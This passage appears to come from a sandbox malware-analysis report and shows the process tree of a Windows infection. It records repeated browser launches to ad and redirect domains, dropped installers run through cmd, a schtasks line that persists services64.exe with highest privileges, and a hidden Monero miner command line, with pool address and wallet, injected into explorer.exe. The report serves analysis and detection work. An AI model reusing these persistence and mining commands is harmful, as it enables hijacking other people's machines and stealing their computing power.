C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:37928
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵PID:40804
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:40916
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=311⤵PID:41772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:42032
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=311⤵PID:51052
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:51172
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968011⤵PID:45424
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:47904
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=311⤵PID:13220
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:13260
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317811⤵PID:15976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:15532
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46511⤵PID:18388
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:18456
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46611⤵PID:20496
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:20500
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵PID:23624
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:24000
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵PID:26200
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:48488
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵PID:30208
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:29480
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵PID:31328
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:4488
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵PID:6384
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:4044
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵PID:6656
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:22860
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵PID:1332
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:49872
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=311⤵PID:34164
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:34312
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=311⤵PID:35328
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:36104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cd-0ca50-1ee-36fa6-994474a45f036\Fiquzhamile.exe"C:\Users\Admin\AppData\Local\Temp\cd-0ca50-1ee-36fa6-994474a45f036\Fiquzhamile.exe"10⤵PID:6692
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qyogue0e.iyl\GcleanerEU.exe /eufive & exit11⤵PID:3680
-
C:\Users\Admin\AppData\Local\Temp\qyogue0e.iyl\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\qyogue0e.iyl\GcleanerEU.exe /eufive12⤵
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
PID:5624 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 24013⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4056
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exe /qn CAMPAIGN="654" & exit11⤵PID:19376
-
C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exeC:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exe /qn CAMPAIGN="654"12⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:33668 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635489676 /qn CAMPAIGN=""654"" " CAMPAIGN="654"13⤵
- Enumerates connected drives
PID:10676
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe & exit11⤵PID:29132
-
C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exeC:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe12⤵PID:31044
-
C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe"C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe" -u13⤵PID:49868
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ixviuwuy.n2h\gcleaner.exe /mixfive & exit11⤵PID:49524
-
C:\Users\Admin\AppData\Local\Temp\ixviuwuy.n2h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ixviuwuy.n2h\gcleaner.exe /mixfive12⤵PID:50108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 50108 -s 23613⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10580
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wgkexly.ako\autosubplayer.exe /S & exit11⤵
- Suspicious use of SetWindowsHookEx
PID:31380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0p513gb.sxl\GcleanerEU.exe /eufive & exit11⤵PID:30084
-
C:\Users\Admin\AppData\Local\Temp\g0p513gb.sxl\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\g0p513gb.sxl\GcleanerEU.exe /eufive12⤵PID:48612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48612 -s 23213⤵
- Program crash
PID:29440
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exe /qn CAMPAIGN="654" & exit11⤵PID:48944
-
C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exeC:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exe /qn CAMPAIGN="654"12⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:49056 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635514877 /qn CAMPAIGN=""654"" " CAMPAIGN="654"13⤵PID:46356
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe & exit11⤵PID:29740
-
C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exeC:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe12⤵PID:27416
-
C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe"C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe" -u13⤵PID:49568
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxvin3pr.tr3\gcleaner.exe /mixfive & exit11⤵PID:49532
-
C:\Users\Admin\AppData\Local\Temp\vxvin3pr.tr3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vxvin3pr.tr3\gcleaner.exe /mixfive12⤵PID:30588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30588 -s 23613⤵
- Program crash
PID:46836
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zazmh5qd.xqr\autosubplayer.exe /S & exit11⤵
- Suspicious use of SetWindowsHookEx
PID:49772
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe5⤵PID:1512
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03ea09aa5c9686e5.exeSun03ea09aa5c9686e5.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:812 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
PID:5800 -
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
PID:4944 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵PID:2376
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:6960
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
PID:6380
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:6760
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵PID:6172
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵PID:5624
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵PID:7840
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵PID:5208
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
- Drops file in Program Files directory
PID:7356
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
PID:5396 -
C:\Users\Admin\AppData\Roaming\2838193.exe"C:\Users\Admin\AppData\Roaming\2838193.exe"9⤵PID:5376
-
-
C:\Users\Admin\AppData\Roaming\997740.exe"C:\Users\Admin\AppData\Roaming\997740.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5860
-
-
C:\Users\Admin\AppData\Roaming\1959615.exe"C:\Users\Admin\AppData\Roaming\1959615.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:476
-
-
C:\Users\Admin\AppData\Roaming\3392017.exe"C:\Users\Admin\AppData\Roaming\3392017.exe"9⤵PID:232
-
